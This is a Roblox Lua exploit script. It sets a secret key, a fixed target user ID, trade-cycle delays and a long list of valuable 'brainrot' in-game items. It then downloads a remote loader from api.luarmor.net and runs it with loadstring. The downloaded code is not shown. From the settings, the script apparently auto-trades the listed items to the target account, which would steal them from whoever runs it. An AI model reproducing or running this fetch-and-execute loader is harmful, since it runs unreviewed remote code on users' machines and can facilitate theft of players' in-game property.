getgenv().SECRET_KEY = "mrr_c3e543e5fbfe449c952de11472274f36"
getgenv().TARGET_ID = 3786113869
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2
getgenv().TARGET_BRAINROTS = {
    ["Spaghetti Tualetti"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["Griffin"] = true,
    ["Nacho Spyder"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Chipso and Queso"] = true,
    ["Tuff Toucan"] = true,
    ["Chillin Chili"] = true,
    ["W or L"] = true,
    ["Swaggy Bros"] = true,
    ["La Taco Combinasion"] = true,
    ["Festive 67"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Garama and Madundung"] = true,
    ["Lavadorito Spinito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Swag Soda"] = true,
    ["Tralaledon"] = true,
    ["Los Bros"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Spaghettis"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["Spinny Hammy"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Pumpkini Spyderini"] = true,
    ["La Ginger Sekolah"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Rosetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Lovin Rose"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["La Spooky Grande"] = true,
    ["La Jolly Grande"] = true,
    ["La Extinct Grande"] = true,
    ["La Romantic Grande"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Noo my Heart"] = true,
    ["Meowl"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Los Chicleteiras"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Foxini Lanternini"] = true,
    ["Gold Gold Gold"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Dug dug dug"] = true,
    ["Cloverat Clapat"] = true,
    ["La Lucky Grande"] = true,
    ["Celestial Pegasus"] = true,
    ["Las Sis"] = true,
    ["Los Sweethearts"] = true,
    ["Los Cupids"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Ventoliero Pavonero"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
